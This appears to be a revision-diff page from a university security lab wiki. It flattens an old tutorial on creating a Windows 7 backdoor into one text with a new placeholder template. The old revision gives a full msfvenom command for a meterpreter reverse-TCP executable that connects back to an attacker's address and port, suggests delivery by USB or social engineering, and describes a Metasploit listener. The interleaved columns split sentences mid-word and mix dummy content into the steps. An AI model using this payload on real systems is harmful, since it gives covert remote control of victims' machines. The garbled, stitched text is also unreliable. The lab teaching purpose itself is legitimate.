Difference between revisions of "PandwaRF"

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search
(BitcoinWallets)
(Changed template to default template)
Line 1: Line 1:
== Summary ==
== Summary ==  
This documentation describes how operating system backdoors can be created using the MSFvenom framework and what the attacker can do once he/she gains access to the victim machine. This particular attack takes advantage of the fact that the Windows 7 firewall by design only inspects the incoming traffic while the outgoing traffic is pretty much ignored. With this in mind one can create a reverse TCP payload, open a particular port and let the victim connect to that open port.  
 
== Introduction ==
Description what this documentation is about.
MSFvenom is an easily manageable framework t
 
== Headline text ==
hat can be used to quickly create Metasploit payloads.
== Requirements ==
== Requirements ==
Devices: 2 devices --> 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)


== Exploit ==
* Operating system: Ubuntu 18.04 bionic amd64
1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line:
* Packages: git emacs
'''msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe.'''
 
With '''-p''' we specify which type of payload we want to create, '''LHOST''' and '''LPORT''' are basically the IP address and the port that we will open for our victim to connect to. '''-f exe''' specifies that the created payload is an executable file and '''-o''' specifies the name under which the file should be saved.
In order to complete these steps, you must have followed [[Some Other Documentation]] before.
 
== Description ==


2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.
=== Step 1 ===


3. Before executing the backdoor file on the victim machine, we need to setup a listener that will listen for connections on a particular port. We will use metasploit to create the listener just like on the photo.
Enter these commands in the shell
[[File:1.png]]


echo foo
echo bar


=== Step 2 ===
Make sure to read
* War and Peace
* Lord of the Rings
* The Baroque Cycle
== Used Hardware ==
[[Device to be used with this documentation]]
[[Maybe another device to be used with this documentation]]
== Courses ==
* [[A course where this documentation was used]] (2017, 2018)
* [[Another one]] (2018)


== References ==
== References ==
https://blog.attify.com/hack-iot-devices-embedded-exploitation/


https://blog.attify.com/hack-iot-device/
* https://wikipedia.org
* https://google.com
 
[[Category:Documentation]]

Revision as of 21:53, 30 January 2022

Summary

Description what this documentation is about.

Requirements

  • Operating system: Ubuntu 18.04 bionic amd64
  • Packages: git emacs

In order to complete these steps, you must have followed Some Other Documentation before.

Description

Step 1

Enter these commands in the shell 

echo foo
echo bar

Step 2

Make sure to read

  • War and Peace
  • Lord of the Rings
  • The Baroque Cycle

Used Hardware

Device to be used with this documentation Maybe another device to be used with this documentation

Courses

References

Retrieved from "https://wiki.elvis.science/index.php?title=PandwaRF&oldid=9730"